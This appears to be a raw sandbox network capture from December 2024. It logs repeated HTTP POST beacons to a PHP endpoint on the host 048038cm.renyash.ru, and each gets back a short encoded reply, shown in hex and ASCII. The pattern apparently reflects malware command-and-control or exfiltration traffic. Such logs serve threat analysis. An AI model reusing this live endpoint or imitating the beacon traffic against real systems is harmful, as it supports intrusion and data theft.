                                                                        Dec 28, 2024 20:43:11.614779949 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:11.948090076 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:12.478688955 CET968INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:12 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFu2GncRJbitF8PIRFrjM6IHjPAoqkCd%2B632Q8bH0WP2MjFSZuQhWhYdyOa2uGgigeInqksmxlNVQB9VD0jbGlF7aThDgiuD9Jo82g9bR2T160M%2BEw3SIPy%2FBEhPu9jiw77OWlsk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409b2ae9e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12917&min_rtt=1677&rtt_var=11183&sent=334&recv=450&lost=0&retrans=0&sent_bytes=43651&recv_bytes=325100&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 28 27 3a 1d 23 5d 28 1f 33 02 03 05 3d 3d 29 59 28 33 2b 41 29 2b 38 09 31 06 3c 1d 3c 38 04 44 33 11 2d 0e 36 3d 06 57 3c 3a 21 46 04 1e 22 03 34 00 3c 5e 3e 30 21 56 29 5a 30 5f 23 20 13 14 27 14 2d 51 31 5e 23 55 22 2c 3f 55 25 3c 3f 19 2c 1d 36 5e 2f 33 22 0d 32 14 2c 5e 0e 12 3a 0a 25 23 2a 05 3c 28 39 5a 26 30 3f 54 25 28 21 10 26 28 2f 1d 20 38 22 06 2b 33 24 0c 33 3f 06 57 2d 3b 3c 04 30 00 30 1e 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S(':#](3==)Y(3+A)+81<<8D3-6=W<:!F"4<^>0!V)Z0_# '-Q1^#U",?U%<?,6^/3"2,^:%#*<(9Z&0?T%(!&(/ 8"+3$3?W-;<00)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:12.479485989 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:12.812088013 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:13.302097082 CET974INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXjK%2Fo42RfOc4NkKok0bZ%2BOycJM9iEBt4XDNsB9421%2FJj2hVaQL7N%2FD2UqJVeYaFaBBFUiuKwIBcYfFtGpRFcYuSPOy8haoHNiA%2F8ScpUwrBK9IHv9pQ8%2BjC9nP%2Bx0X6JiX5HJnv"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409b81cc442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12491&min_rtt=1677&rtt_var=10316&sent=339&recv=455&lost=0&retrans=0&sent_bytes=44644&recv_bytes=327506&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0d 28 0a 32 58 20 3b 23 0d 30 12 2a 14 3d 3e 2a 01 3d 0e 0e 19 3e 3b 27 51 25 5e 2c 5e 3c 5e 2a 07 27 01 26 55 22 2e 34 53 28 3a 21 46 04 1e 21 5b 23 3e 30 13 3d 0d 25 56 2b 3c 3c 5d 35 33 39 1a 30 5c 32 08 31 38 0d 55 35 3c 23 55 24 2c 06 0b 2f 34 04 5f 39 56 31 55 32 14 2c 5e 0e 12 39 50 31 09 3d 5c 28 5e 39 5c 30 1e 15 1f 27 3b 29 58 26 2b 23 57 23 06 39 59 3f 56 23 10 30 3c 3f 0b 2d 3b 02 00 26 3a 2c 54 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (2X ;#0*=>*=>;'Q%^,^<^*'&U".4S(:!F![#>0=%V+<<]5390\218U5<#U$,/4_9V1U2,^9P1=\(^9\0';)X&+#W#9Y?V#0<?-;&:,T)2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:13.310853958 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2060
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:13.643158913 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:14.643465042 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JyJS5jIIQ2oHs5R%2Be5oVdixTZ9cYRB3lUuwO4KDbiF4xVYqxEm8%2Fcj0Pe6afbv5p9OaUpy0IS70gkZIPFmPFteDreLtqXdGosStkiaUmYGzmbS8jfVATcbU5nfmjVGOBC%2Fef7JdE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409bd4a1542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11810&min_rtt=1677&rtt_var=9049&sent=344&recv=460&lost=0&retrans=0&sent_bytes=45643&recv_bytes=329872&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 28 24 0b 01 23 15 30 52 27 3c 26 5e 3d 03 2e 01 3e 30 01 41 3e 38 23 51 25 5e 3b 07 2b 28 35 19 27 01 26 51 20 3d 0a 1e 3f 2a 21 46 04 1e 21 11 23 2e 06 58 3e 1d 35 55 3e 02 23 04 35 56 35 14 30 39 31 19 31 16 02 0b 21 02 3b 57 25 3c 2b 56 38 27 36 19 3a 20 2e 0e 25 3e 2c 5e 0e 12 3a 0e 25 30 14 04 3c 28 3d 5d 24 0e 3c 0f 26 15 0f 59 24 28 2f 13 23 2b 21 5e 3f 09 3c 0b 33 3f 2b 0c 2e 3b 3b 15 30 17 2c 13 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#($#0R'<&^=.>0A>8#Q%^;+(5'&Q =?*!F!#.X>5U>#5V50911!;W%<+V8'6: .%>,^:%0<(=]$<&Y$(/#+!^?<3?+.;;0,=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:14.644414902 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JyJS5jIIQ2oHs5R%2Be5oVdixTZ9cYRB3lUuwO4KDbiF4xVYqxEm8%2Fcj0Pe6afbv5p9OaUpy0IS70gkZIPFmPFteDreLtqXdGosStkiaUmYGzmbS8jfVATcbU5nfmjVGOBC%2Fef7JdE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409bd4a1542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11810&min_rtt=1677&rtt_var=9049&sent=344&recv=460&lost=0&retrans=0&sent_bytes=45643&recv_bytes=329872&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 28 24 0b 01 23 15 30 52 27 3c 26 5e 3d 03 2e 01 3e 30 01 41 3e 38 23 51 25 5e 3b 07 2b 28 35 19 27 01 26 51 20 3d 0a 1e 3f 2a 21 46 04 1e 21 11 23 2e 06 58 3e 1d 35 55 3e 02 23 04 35 56 35 14 30 39 31 19 31 16 02 0b 21 02 3b 57 25 3c 2b 56 38 27 36 19 3a 20 2e 0e 25 3e 2c 5e 0e 12 3a 0e 25 30 14 04 3c 28 3d 5d 24 0e 3c 0f 26 15 0f 59 24 28 2f 13 23 2b 21 5e 3f 09 3c 0b 33 3f 2b 0c 2e 3b 3b 15 30 17 2c 13 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#($#0R'<&^=.>0A>8#Q%^;+(5'&Q =?*!F!#.X>5U>#5V50911!;W%<+V8'6: .%>,^:%0<(=]$<&Y$(/#+!^?<3?+.;;0,=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:14.651783943 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:14.983839035 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:15.517442942 CET974INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:15 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yci0cBR8tS9xtvwEntw%2Bq0TkWuBFm%2B5JFf13EJvlRCYV5ZfF%2F01gRrqzmce7Q%2F10Mwh7XLJyX%2B%2FVP%2FeHm%2Bk6M%2Fx68ytSKYaSjvZ1EZFbekDuTk3cAo2aA1pT%2Bpx5iS4VMTIbhDAe"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409c5a9f542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11651&min_rtt=1677&rtt_var=8988&sent=350&recv=465&lost=0&retrans=0&sent_bytes=46633&recv_bytes=332278&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0d 3c 42 31 00 34 38 30 56 30 12 22 5d 3d 04 36 04 2a 56 2b 0a 2a 06 3b 54 26 28 28 5e 3e 28 3e 43 27 59 2e 1e 21 5b 28 1c 28 3a 21 46 04 1e 22 04 21 3e 0d 00 3d 0d 32 0b 29 12 01 06 36 30 17 59 30 3a 03 50 31 38 09 1e 22 12 06 0c 24 3c 3c 0e 2f 1a 3e 5d 3a 0e 03 53 24 2e 2c 5e 0e 12 3a 0b 32 0e 14 03 3c 06 35 59 27 1e 15 54 26 15 22 03 33 02 2f 55 34 06 2d 5d 28 09 20 0e 26 2f 01 0d 2d 2b 2b 1b 27 2a 30 1e 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a
                                                                        Data Ascii: 98 <B1480V0"]=6*V+*;T&((^>(>C'Y.![((:!F"!>=2)60Y0:P18"$<</>]:S$.,^:2<5Y'T&"3/U4-]( &/-++'*0=!^/,Q4TV
                                                                        Dec 28, 2024 20:43:15.729614973 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:16.063652039 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:16.551489115 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WWKYuMMzzrnhdH8UpLVWlgQSWRFztzfYmaynJyHx7%2B1f8kFQJRFIedTNNaMw0cP5L7YS7BTXOIqLoqpHYFhJKApto4w4l3Kyjr9rDudN5WPaxNIabuq%2FDGhfAzQa5w1eB66Ui8t%2F"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409cc696442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12047&min_rtt=1677&rtt_var=7929&sent=356&recv=471&lost=0&retrans=0&sent_bytes=47637&recv_bytes=334684&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 3f 34 36 5b 20 02 38 54 33 3c 2e 5f 2b 3e 3a 03 29 30 27 44 3d 16 19 51 26 28 30 58 3f 06 04 07 24 01 08 51 35 3d 34 1c 2a 2a 21 46 04 1e 22 03 34 00 02 5b 28 33 03 53 3d 3f 24 17 23 30 35 5d 24 03 31 51 32 38 3c 0a 35 3c 2b 55 24 3f 23 52 38 1a 32 19 2f 20 25 1f 31 3e 2c 5e 0e 12 39 50 25 1e 31 10 29 3b 22 05 33 30 19 50 26 15 03 10 27 38 3b 1d 20 38 0c 07 28 0e 3f 53 33 3f 38 57 39 02 20 01 24 00 23 0e 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U?46[ 8T3<._+>:)0'D=Q&(0X?$Q5=4**!F"4[(3S=?$#05]$1Q28<5<+U$?#R82/ %1>,^9P%1);"30P&'8; 8(?S3?8W9 $#*"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:16.554124117 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:16.886837006 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:17.390621901 CET961INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:17 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GdlYAYdSBz3yrjx9xk18o6GDLVa4WdyR6lSmgEsH4KQO1DD84e8XAlPpr9in8K3fw699iq4AOw5YXo%2BYI9WvQyLJdYBpOWfq2k2bSnulqLrStwomqJ4ibgnPjSYxzkN8rViKYXe9"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409d18ee642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12284&min_rtt=1677&rtt_var=9031&sent=360&recv=476&lost=0&retrans=0&sent_bytes=48627&recv_bytes=337090&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 3c 1d 36 59 37 05 34 56 24 3c 3e 58 2b 3e 3d 1e 29 20 3f 08 3d 01 23 1c 25 16 05 03 3c 38 31 1d 30 3f 31 0c 21 5b 38 11 28 00 21 46 04 1e 21 10 34 3d 30 58 2a 1d 26 0a 2a 5a 3c 5e 36 33 3a 07 26 39 3e 0a 25 38 27 52 36 3c 33 13 33 05 3b 51 2f 34 35 06 2d 09 22 0c 24 2e 2c 5e 0e 12 39 52 26 1e 1b 12 28 16 25 11 33 09 3b 1d 25 2b 26 05 27 3b 2b 13 34 2b 2d 16 2b 09 37 55 33 3f 09 0e 2d 38 23 5c 27 17 01 0e 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 <6Y74V$<>X+>=) ?=#%<810?1![8(!F!4=0X*&*Z<^63:&9>%8'R6<33;Q/45-"$.,^9R&(%3;%+&';+4+-+7U3?-8#\'=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:17.396971941 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:17.729826927 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:18.263089895 CET973INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vspf2onCtE8XecdxOYDUjTr%2Fz%2F3U3%2Bsp89gk4z3z2azLsZEXu3wNqlHKAKOO%2FWmqAmXBvRqTJLB0oFAX9T%2FH9%2Bz2bVNrNeyiRNTuv2FKYU%2Fa5fZ2pLw8j2K9e2nMSrkLslioBp95"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409d6cc5142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12581&min_rtt=1677&rtt_var=9999&sent=365&recv=481&lost=0&retrans=0&sent_bytes=49613&recv_bytes=339496&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 2b 34 2d 03 34 2b 09 0a 33 2f 26 59 3e 2d 25 1e 2a 30 28 19 2b 38 15 1f 27 38 0a 5e 3c 38 0c 43 33 3f 26 1c 36 13 30 54 3f 00 21 46 04 1e 21 5c 23 10 30 59 29 30 29 54 3e 3c 3b 05 23 33 3a 05 24 04 25 56 25 3b 23 57 35 02 06 08 33 3c 3b 53 2f 1a 0f 06 39 0e 39 55 25 14 2c 5e 0e 12 3a 09 31 23 35 5c 3f 06 14 01 27 30 15 51 25 28 22 03 27 15 23 55 34 28 2d 58 3f 33 2b 1e 27 01 06 1f 2e 2b 0d 15 24 39 27 0c 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#+4-4+3/&Y>-%*0(+8'8^<8C3?&60T?!F!\#0Y)0)T><;#3:$%V%;#W53<;S/99U%,^:1#5\?'0Q%("'#U4(-X?3+'.+$9')!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:18.267832994 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:18.600934982 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:19.097357035 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXI5Rq%2B2xfQJc1g3pyJhriSkC6zRhwp59QEx4UyMB6NVfHh1UrrkliArTWAzZUVR34seBbkbaX5lnppdDA31Px5mjYHlb2bIDA%2Byi69cvLzptXQ%2B%2FbMAVcSAWKslEAZPtqGllOTO"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409dc4aac42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11305&min_rtt=1677&rtt_var=7655&sent=370&recv=486&lost=0&retrans=0&sent_bytes=50611&recv_bytes=341902&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0d 28 27 2a 5b 37 3b 0a 11 30 3c 21 04 2b 2d 0f 11 3d 0e 23 42 3d 38 37 57 25 38 24 12 3f 3b 22 41 24 01 22 50 36 3d 24 1e 2b 2a 21 46 04 1e 22 05 20 58 20 10 28 33 07 57 29 3c 24 19 22 20 2a 01 24 5c 25 14 25 28 01 55 22 12 20 09 24 12 01 50 3b 24 2a 5b 3a 33 2d 10 25 14 2c 5e 0e 12 39 52 32 1e 21 11 28 16 32 00 26 20 1a 0e 31 38 2e 00 27 3b 38 08 34 06 21 15 28 1e 23 56 30 11 23 0c 3a 15 09 5c 33 00 23 0e 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ('*[7;0<!+-=#B=87W%8$?;"A$"P6=$+*!F" X (3W)<$" *$\%%(U" $P;$*[:3-%,^9R2!(2& 18.';84!(#V0#:\3#*!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:19.103744030 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:19.436144114 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:20.285274029 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJyDbg28hlf8jc6iTk6JCDxYtKRh1ps5K1abhMgTNUO527C2YL0e20q2BiMqvXJzbOOnlk4KG%2B%2BbJc1CMJP4pmRaQrbdpxt5Tz%2FKAffTiw8sdLQ%2FQQNJ6FtBWmqCJH5iVRAwAVEh"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409e17ff942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11382&min_rtt=1677&rtt_var=8299&sent=375&recv=491&lost=0&retrans=0&sent_bytes=51603&recv_bytes=344308&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 2b 34 0f 03 23 2b 2b 0f 26 3f 39 01 3e 3e 3d 1e 28 30 27 09 3d 01 24 08 25 38 0a 12 3f 38 0c 07 33 3c 3a 54 35 03 0a 53 2b 3a 21 46 04 1e 21 5c 20 07 30 5f 3e 33 3d 1c 2a 2c 2c 17 35 33 21 14 33 2a 03 56 25 16 23 1e 21 2c 3f 55 27 02 30 0e 2f 0a 0f 05 39 30 0f 1f 31 2e 2c 5e 0e 12 39 1a 31 33 21 1f 29 3b 26 03 24 23 34 0e 26 2b 26 05 30 38 27 54 21 3b 39 5d 3c 33 2b 53 24 3f 28 56 2e 2b 38 04 24 2a 37 0d 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S+4#++&?9>>=(0'=$%8?83<:T5S+:!F!\ 0_>3=*,,53!3*V%#!,?U'0/901.,^913!);&$#4&+&08'T!;9]<3+S$?(V.+8$*7)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:20.298218012 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:20.632345915 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:21.165225029 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3O%2Fag5lbFfqP5Vu6kAgQmOYimGJrXAMuiMerxp3qO5OiQPJaqv2kz%2BODmicnasQnAz37S78SU5qk0oCk1WVUDjwiopyK4qonX7yjD2RYfXAQb%2FeHI9JfNXnwOS88fKBlLP4GJBH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409e8f90242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10422&min_rtt=1677&rtt_var=6702&sent=381&recv=496&lost=0&retrans=0&sent_bytes=52595&recv_bytes=346714&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
